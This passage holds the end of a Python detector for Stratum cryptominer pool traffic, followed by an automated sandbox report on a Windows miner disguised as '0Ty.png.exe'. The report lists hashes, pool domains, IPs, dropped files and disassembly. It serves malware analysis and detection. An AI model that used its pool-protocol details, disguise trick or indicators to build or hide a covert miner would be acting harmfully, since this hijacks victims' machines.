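            return {"kind": "job", "job_id": job["job_id"], "target": job["target"]}
    return None


def scan_stream(lines):
    """Return the Stratum messages found in an ordered list of payload lines."""
    hits = []
    for line in lines:
        info = classify_stratum_line(line)
        if info is not None:
            hits.append(info)
    return hits


# Constructed sample payload lines (not captured from this analysis): one
# unrelated HTTP request, an XMRig-style login, the pool's reply carrying a
# job, and a share submission. Wallet, job id and target are placeholders.
SAMPLE_LINES = [
    "GET /update HTTP/1.1",
    json.dumps({"id": 1, "jsonrpc": "2.0", "method": "login",
                "params": {"login": "4PLACEHOLDERWALLET", "pass": "x",
                           "agent": "XMRig/6.22.0", "algo": ["rx/0"]}}),
    json.dumps({"id": 1, "jsonrpc": "2.0", "error": None,
                "result": {"id": "abc", "status": "OK",
                           "job": {"blob": "0c0c", "job_id": "job-1",
                                   "target": "b88d0600", "algo": "rx/0"}}}),
    json.dumps({"id": 2, "jsonrpc": "2.0", "method": "submit",
                "params": {"id": "abc", "job_id": "job-1",
                           "nonce": "deadbeef", "result": "00" * 32}}),
]

if __name__ == "__main__":
    for hit in scan_stream(SAMPLE_LINES):
        print(hit)
```

Feed the function the reassembled TCP payload split on newlines (pool traffic is one JSON object per line); the agent string and wallet from the login request are the two fields worth keeping in a case, since the pool hostname changes far more often than the wallet does.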
                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1580691
                                          Start date and time:2024-12-25 17:22:05 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 11m 23s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:70
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:6
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:0Ty.png.exe
                                          Detection:MAL
                                          Classification:mal100.spyw.evad.mine.winEXE@105/17@1/2
                                          EGA Information:
                                          • Successful, ratio: 87.5%
                                          HCA Information:Failed
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Exclude process from analysis (whitelisted): WmiPrvSE.exe
                                          • Excluded IPs from analysis (whitelisted): 4.175.87.197, 52.165.164.15, 40.69.42.241, 40.126.53.19, 40.126.53.17, 20.190.181.5, 40.126.53.9, 20.231.128.66, 20.231.128.67, 40.126.53.15, 20.190.181.4, 13.107.246.63
                                          • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net
                                          • Execution Graph export aborted for target 0Ty.png.exe, PID 7416 because it is empty
                                          • Execution Graph export aborted for target weiuemyrzjra.exe, PID 4280 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                          • Report size getting too big, too many NtCreateKey calls found.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
11:22:57 | API Interceptor | 57x Sleep call for process: powershell.exe modified
11:23:38 | API Interceptor | 290803x Sleep call for process: lsass.exe modified
11:23:38 | API Interceptor | 360735x Sleep call for process: winlogon.exe modified
11:23:39 | API Interceptor | 354512x Sleep call for process: dwm.exe modified
11:23:39 | API Interceptor | 663x Sleep call for process: svchost.exe modified
11:23:48 | API Interceptor | 262x Sleep call for process: dllhost.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
85.209.133.29 | Od6wNV2xta.elf | malicious | BillGates |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
monerooceans.stream | main.exe | malicious | Blank Grabber, SilentXMRMiner, Xmrig | 149.102.143.109
monerooceans.stream | file.exe | malicious | Xmrig | 149.102.143.109
monerooceans.stream | file.exe | malicious | Xmrig | 149.102.143.109
monerooceans.stream | file.exe | malicious | Xmrig | 149.102.143.109
monerooceans.stream | file.exe | malicious | Xmrig | 149.102.143.109
monerooceans.stream | MenSncKnTI.exe | malicious | Xmrig | 149.102.143.109
monerooceans.stream | SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | malicious | Xmrig | 149.102.143.109
monerooceans.stream | MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip | malicious | Xmrig | 44.196.193.227
monerooceans.stream | 17ae2fbf36a41622374adfd3b1608e08.10.dr | malicious | Unknown | 44.224.209.130
monerooceans.stream | SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe | malicious | Xmrig | 44.196.193.227
bg.microsoft.map.fastly.net | 0442.pdf.exe | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | 0442.pdf.exe | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | yvaKqhmD4L.exe | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | #U5b89#U88c5#U7a0b#U5e8f_1.1.1.exe | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | IoIB9gQ6OQ.exe | malicious | AsyncRAT, PureLog Stealer | 199.232.210.172
bg.microsoft.map.fastly.net | eCompleted_419z.pdf | malicious | HTMLPhisher | 199.232.214.172
bg.microsoft.map.fastly.net | 3FG4bsfkEwmxFYY.exe | malicious | FormBook | 199.232.214.172
bg.microsoft.map.fastly.net | #U5b89#U88c5#U52a9#U624b1.0.3.exe | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | eCompleted_419z.pdf | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | Onboard Training Checklist v1.1 - Wyatt Young (1).xlsx | malicious | Unknown | 199.232.214.172
Match | Associated Sample Name / URL | Detection | Threat Name | Context
KCOM-SPNService-ProviderNetworkex-MistralGB | https://a41c415c7bccad129d61b50d2032009e.aktive-senioren.biz/de/st/1?#bqcnl4tocgzq65tck3bv | malicious | Unknown | 194.164.200.113
KCOM-SPNService-ProviderNetworkex-MistralGB | ub8ehJSePAfc9FYqZIT6.arm.elf | malicious | Mirai | 195.26.252.19
KCOM-SPNService-ProviderNetworkex-MistralGB | ub8ehJSePAfc9FYqZIT6.sh4.elf | malicious | Unknown | 195.26.252.19
KCOM-SPNService-ProviderNetworkex-MistralGB | ub8ehJSePAfc9FYqZIT6.ppc.elf | malicious | Unknown | 195.26.252.19
KCOM-SPNService-ProviderNetworkex-MistralGB | ub8ehJSePAfc9FYqZIT6.m68k.elf | malicious | Mirai | 195.26.252.19
KCOM-SPNService-ProviderNetworkex-MistralGB | ub8ehJSePAfc9FYqZIT6.arm7.elf | malicious | Mirai | 195.26.252.19
KCOM-SPNService-ProviderNetworkex-MistralGB | ub8ehJSePAfc9FYqZIT6.mips.elf | malicious | Unknown | 195.26.252.19
KCOM-SPNService-ProviderNetworkex-MistralGB | ub8ehJSePAfc9FYqZIT6.arm6.elf | malicious | Unknown | 195.26.252.19
KCOM-SPNService-ProviderNetworkex-MistralGB | ub8ehJSePAfc9FYqZIT6.i686.elf | malicious | Unknown | 195.26.252.19
KCOM-SPNService-ProviderNetworkex-MistralGB | ub8ehJSePAfc9FYqZIT6.x86.elf | malicious | Unknown | 195.26.252.19
CMCSUS | armv5l.elf | malicious | Unknown | 140.89.4.183
CMCSUS | ppc.elf | malicious | Mirai | 140.89.48.90
CMCSUS | la.bot.arm7.elf | malicious | Mirai | 208.110.207.234
CMCSUS | arm5.nn-20241218-1651.elf | malicious | Mirai, Okiru | 194.180.237.103
CMCSUS | xt.exe | malicious | XWorm | 45.66.231.231
CMCSUS | https://share.hsforms.com/1Izw71u6TTr2VFC-t9f1KFgsvgdj | malicious | Unknown | 85.208.139.7
CMCSUS | x86_64.elf | malicious | Mirai | 50.238.119.249
CMCSUS | arm.elf | malicious | Unknown | 50.226.169.202
CMCSUS | armv7l.elf | malicious | Mirai | 216.45.216.151
CMCSUS | rebirth.spc.elf | malicious | Mirai, Okiru | 50.220.100.140
                                            No context
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Windows\Temp\ihddniqxcjeb.sys | Qhx6a6VLAH.exe | malicious | Xmrig
C:\Windows\Temp\ihddniqxcjeb.sys | 88aext0k.exe | malicious | Xmrig
C:\Windows\Temp\ihddniqxcjeb.sys | gaozw40v.exe | malicious | Xmrig
C:\Windows\Temp\ihddniqxcjeb.sys | c2.exe | malicious | Xmrig
C:\Windows\Temp\ihddniqxcjeb.sys | ldr.ps1 | malicious | GO Miner, Xmrig
C:\Windows\Temp\ihddniqxcjeb.sys | ZppxPm0ASs.exe | malicious | Xmrig
C:\Windows\Temp\ihddniqxcjeb.sys | file.exe | malicious | Amadey, LummaC Stealer, Vidar, Xmrig
C:\Windows\Temp\ihddniqxcjeb.sys | feZvV3DCj8.exe | malicious | Xmrig
C:\Windows\Temp\ihddniqxcjeb.sys | services64.exe | malicious | Xmrig
C:\Windows\Temp\ihddniqxcjeb.sys | file.exe | malicious | Amadey, LummaC Stealer, Stealc, Vidar, Xmrig
                                                                Process:C:\Users\user\Desktop\0Ty.png.exe
                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):5457920
                                                                Entropy (8bit):6.515282439309424
                                                                Encrypted:false
                                                                SSDEEP:98304:iAVs069jHTPkc8zU7Jr93Wu+ieSaCKFa/9hAYNS1gtgghI+lw:iMnUjzPkcyI93Wu+ieSaCKFRYNS1gtV8
                                                                MD5:3CAE1F11044D2CA787824610A40F1696
                                                                SHA1:BF4AF642F36E87B887F973F47A46BCB2E656C636
                                                                SHA-256:50AE56D020D35A747BDF32ACBD7C9CC23F8A6827D19C5F32BB05D068ACF47251
                                                                SHA-512:0918A7876C39CF901E9A4128F456683D85D2564767600CE4536C9D0BCD4BE1B380CAD8FCDF6D0B96FD30E48A0F1E73E66DF6D5F279FB31E5FE5ECCA3E2F856A7
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 66%
                                                                Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d...O.Yg.........."...........R.....@..........@..............................S...........`.....................................................<.............S...............S.x...............................(.......8...........8...`............................text............................... ..`.rdata..,(.......*..................@..@.data...h.R......nR.................@....pdata........S......@S.............@..@.00cfg........S......BS.............@..@.tls..........S......DS.............@....reloc..x.....S......FS.............@..B................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\lsass.exe
                                                                File Type:very short file (no magic)
                                                                Category:modified
                                                                Size (bytes):1
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3::
                                                                MD5:93B885ADFE0DA089CDF634904FD59F71
                                                                SHA1:5BA93C9DB0CFF93F52B521D7420E43F6EDA2784F
                                                                SHA-256:6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
                                                                SHA-512:B8244D028981D693AF7B456AF8EFA4CAD63D282E19FF14942C246E50D9351D22704A802A71C3580B6370DE4CEB293C324A8423342557D4E5C38438F0E36910EE
                                                                Malicious:false
                                                                Preview:.
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):64
                                                                Entropy (8bit):1.1510207563435464
                                                                Encrypted:false
                                                                SSDEEP:3:Nlllullkv/tz:NllU+v/
                                                                MD5:6442F277E58B3984BA5EEE0C15C0C6AD
                                                                SHA1:5343ADC2E7F102EC8FB6A101508730898CB14F57
                                                                SHA-256:36B765624FCA82C57E4C5D3706FBD81B5419F18FC3DD7B77CD185E6E3483382D
                                                                SHA-512:F9E62F510D5FB788F40EBA13287C282444607D2E0033D2233BC6C39CA3E1F5903B65A07F85FA0942BEDDCE2458861073772ACA06F291FA68F23C765B0CA5CA17
                                                                Malicious:false
                                                                Preview:@...e................................................@..........
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):64
                                                                Entropy (8bit):0.34726597513537405
                                                                Encrypted:false
                                                                SSDEEP:3:Nlll:Nll
                                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                Malicious:false
                                                                Preview:@...e...........................................................
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe
                                                                File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):14544
                                                                Entropy (8bit):6.2660301556221185
                                                                Encrypted:false
                                                                SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 5%
                                                                Joe Sandbox View:
• Filename: Qhx6a6VLAH.exe, Detection: malicious
• Filename: 88aext0k.exe, Detection: malicious
• Filename: gaozw40v.exe, Detection: malicious
• Filename: c2.exe, Detection: malicious
• Filename: ldr.ps1, Detection: malicious
• Filename: ZppxPm0ASs.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: feZvV3DCj8.exe, Detection: malicious
• Filename: services64.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                                File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                Entropy (8bit):6.515282439309424
                                                                TrID:
                                                                • Win64 Executable GUI (202006/5) 92.65%
                                                                • Win64 Executable (generic) (12005/4) 5.51%
                                                                • Generic Win/DOS Executable (2004/3) 0.92%
                                                                • DOS Executable Generic (2002/1) 0.92%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:0Ty.png.exe
                                                                File size:5'457'920 bytes
                                                                MD5:3cae1f11044d2ca787824610a40f1696
                                                                SHA1:bf4af642f36e87b887f973f47a46bcb2e656c636
                                                                SHA256:50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251
                                                                SHA512:0918a7876c39cf901e9a4128f456683d85d2564767600ce4536c9d0bcd4be1b380cad8fcdf6d0b96fd30e48a0f1e73e66df6d5f279fb31e5fe5ecca3e2f856a7
                                                                SSDEEP:98304:iAVs069jHTPkc8zU7Jr93Wu+ieSaCKFa/9hAYNS1gtgghI+lw:iMnUjzPkcyI93Wu+ieSaCKFRYNS1gtV8
                                                                TLSH:A146236833D4A8FCCFE40831DAF67598679220A20F3D75CA47D65E2317E2AD460F62D9
                                                                File Content Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d...O.Yg.........."...........R.....@..........@..............................S...........`........................................
                                                                Icon Hash:90cececece8e8eb0
                                                                Entrypoint:0x140001140
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x140000000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x6759034F [Wed Dec 11 03:13:19 2024 UTC]
                                                                TLS Callbacks:0x40001760, 0x1, 0x400017e0, 0x1
                                                                CLR (.Net) Version:
                                                                OS Version Major:6
                                                                OS Version Minor:0
                                                                File Version Major:6
                                                                File Version Minor:0
                                                                Subsystem Version Major:6
                                                                Subsystem Version Minor:0
                                                                Import Hash:203d63d5d9a088e2d84cef737227986b
                                                                Instruction
                                                                dec eax
                                                                sub esp, 28h
                                                                dec eax
                                                                mov eax, dword ptr [0000AED5h]
                                                                mov dword ptr [eax], 00000001h
                                                                call 00007F11B0B38E4Fh
                                                                nop
                                                                nop
                                                                nop
                                                                dec eax
                                                                add esp, 28h
                                                                ret
                                                                nop
                                                                inc ecx
                                                                push edi
                                                                inc ecx
                                                                push esi
                                                                push esi
                                                                push edi
                                                                push ebx
                                                                dec eax
                                                                sub esp, 20h
                                                                dec eax
                                                                mov eax, dword ptr [00000030h]
                                                                dec eax
                                                                mov edi, dword ptr [eax+08h]
                                                                dec eax
                                                                mov esi, dword ptr [0000AEC9h]
                                                                xor eax, eax
                                                                dec eax
                                                                cmpxchg dword ptr [esi], edi
                                                                sete bl
                                                                je 00007F11B0B38E70h
                                                                dec eax
                                                                cmp edi, eax
                                                                je 00007F11B0B38E6Bh
                                                                dec esp
                                                                mov esi, dword ptr [0000D1D9h]
                                                                nop word ptr [eax+eax+00000000h]
                                                                mov ecx, 000003E8h
                                                                inc ecx
                                                                call esi
                                                                xor eax, eax
                                                                dec eax
                                                                cmpxchg dword ptr [esi], edi
                                                                sete bl
                                                                je 00007F11B0B38E47h
                                                                dec eax
                                                                cmp edi, eax
                                                                jne 00007F11B0B38E29h
                                                                dec eax
                                                                mov edi, dword ptr [0000AE90h]
                                                                mov eax, dword ptr [edi]
                                                                cmp eax, 01h
                                                                jne 00007F11B0B38E4Eh
                                                                mov ecx, 0000001Fh
                                                                call 00007F11B0B42D94h
                                                                jmp 00007F11B0B38E69h
                                                                cmp dword ptr [edi], 00000000h
                                                                je 00007F11B0B38E4Bh
                                                                mov byte ptr [00534A81h], 00000001h
                                                                jmp 00007F11B0B38E5Bh
                                                                mov dword ptr [edi], 00000001h
                                                                dec eax
                                                                mov ecx, dword ptr [0000AE7Ah]
                                                                dec eax
                                                                mov edx, dword ptr [0000AE7Bh]
                                                                call 00007F11B0B42D8Bh
                                                                mov eax, dword ptr [edi]
                                                                cmp eax, 01h
                                                                jne 00007F11B0B38E5Bh
                                                                dec eax
                                                                mov ecx, dword ptr [0000AE50h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xe098 | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x538000 | 0x18c | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x53b000 | 0x78 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0xc0a0 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xc410 | 0x138 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0xe238 | 0x160 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xa2b6 | 0xa400 | 15e6d8e8492bd42c1636b8bdcb03f1d4 | False | 0.48323170731707316 | data | 6.144150286815596 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0xc000 | 0x282c | 0x2a00 | e8f2e2af559520d2a70a0f0df69c0424 | False | 0.46726190476190477 | data | 4.5977717916125185 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xf000 | 0x528668 | 0x526e00 | dd2d4804696c12a165f918f955ed5774 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x538000 | 0x18c | 0x200 | d48a4feaa1dad981f0ea34c689c1df39 | False | 0.5078125 | data | 3.1886506090500264 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.00cfg | 0x539000 | 0x10 | 0x200 | b18c7380298e104adf73576fa46bccc1 | False | 0.04296875 | data | 0.15127132530476972 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls | 0x53a000 | 0x10 | 0x200 | bf619eac0cdf3f68d496ea9344137e8b | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc | 0x53b000 | 0x78 | 0x200 | 1d74cbdd12eb7ad04156a4596b4304ab | False | 0.234375 | data | 1.410823287769429 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
DLL | Import
